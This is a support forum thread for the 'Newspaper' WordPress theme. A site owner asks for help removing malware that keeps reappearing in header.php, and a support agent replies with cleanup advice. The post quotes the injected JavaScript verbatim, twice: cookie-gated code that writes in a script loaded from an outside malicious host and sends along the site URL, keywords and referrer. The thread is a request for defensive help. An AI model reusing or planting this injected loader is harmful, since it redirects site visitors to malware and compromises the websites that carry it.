header malware script

Posted in: Newspaper
Post count: 5

hi,

im having problems with some malware script that is appearing every day in header.php.

script looks like this and is riderectin my site in another malware sites.

can u please tell me how can i find and remove the malware

thnx.

Script:

“””<script>var b=”red”;c=”mod”;function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e=”expires=”+d.toUTCString();document.cookie=a+”=”+b+”; “+e}function getCookie(a){for(var b=a+”=”,c=document.cookie.split(“;”),d=0;d<c.length;d++){for(var e=c[d];” “==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie(“ytm_hit1”)&&(setCookie(“ytm_hit1”,1,1),1==getCookie(“ytm_hit1”)&&(setCookie(“ytm_hit1″,2,1),document.write(‘<script type=”text/javascript” src=”‘ + ‘http://sweetambrosia.biz/js/jquery.min.php&#8217; + ‘?key=b64’ + ‘&utm_campaign=’ + ‘snt2014’ + ‘&utm_source=’ + window.location.host + ‘&utm_medium=’ + ‘&utm_content=’ + window.location + ‘&utm_term=’ + encodeURIComponent(((k=(function(){var keywords = ”;var metas = document.getElementsByTagName(‘meta’);if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == “keywords”) {keywords += metas[x].content;}}}return keywords !== ” ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?”:t:v[1]:k)) + ‘&se_referrer=’ + encodeURIComponent(document.referrer) + ‘”><‘ + ‘/script>’)));</script><script>var b=”red”;c=”mod”;function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e=”expires=”+d.toUTCString();document.cookie=a+”=”+b+”; “+e}function getCookie(a){for(var b=a+”=”,c=document.cookie.split(“;”),d=0;d<c.length;d++){for(var e=c[d];” “==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie(“ytm_hit1”)&&(setCookie(“ytm_hit1”,1,1),1==getCookie(“ytm_hit1”)&&(setCookie(“ytm_hit1″,2,1),document.write(‘<script type=”text/javascript” src=”‘ + ‘http://sweetambrosia.biz/js/jquery.min.php&#8217; + ‘?key=b64’ + ‘&utm_campaign=’ + ‘snt2014’ + ‘&utm_source=’ + window.location.host + ‘&utm_medium=’ + ‘&utm_content=’ + window.location + ‘&utm_term=’ + encodeURIComponent(((k=(function(){var keywords = ”;var metas = document.getElementsByTagName(‘meta’);if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == “keywords”) {keywords += metas[x].content;}}}return keywords !== ” ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?”:t:v[1]:k)) + ‘&se_referrer=’ + encodeURIComponent(document.referrer) + ‘”><‘ + ‘/script>’)));</script>”””

Post count: 23312

Hello fitore,

We have tested the theme security rigorously before releasing and also it was tested and analyzed by Envato reviewers and if would have any security issues would not pass their reviews.
Checking our demo too can be seen that is no thread there so can’t be a theme’s issue: http://screencast.com/t/hfBXLFGJSqzD
Try to deactivate all plugins except Visual Composer, clear all caches and test again. Also, I found here some resources that may help you fixing this issues: http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/http://vivavivugeek.blogspot.ro/2014/03/detect-and-remove-spam-seo-blackhat-seo.html
If the problem is still there, try to make a new clean install from scratch via FTP, use only the required plugins, clear all your caches, purge CDN files and check the results.

Hope this help.
Thanks!

Viewing 2 posts - 1 through 2 (of 2 total)
The forum ‘Newspaper’ is closed to new topics and replies.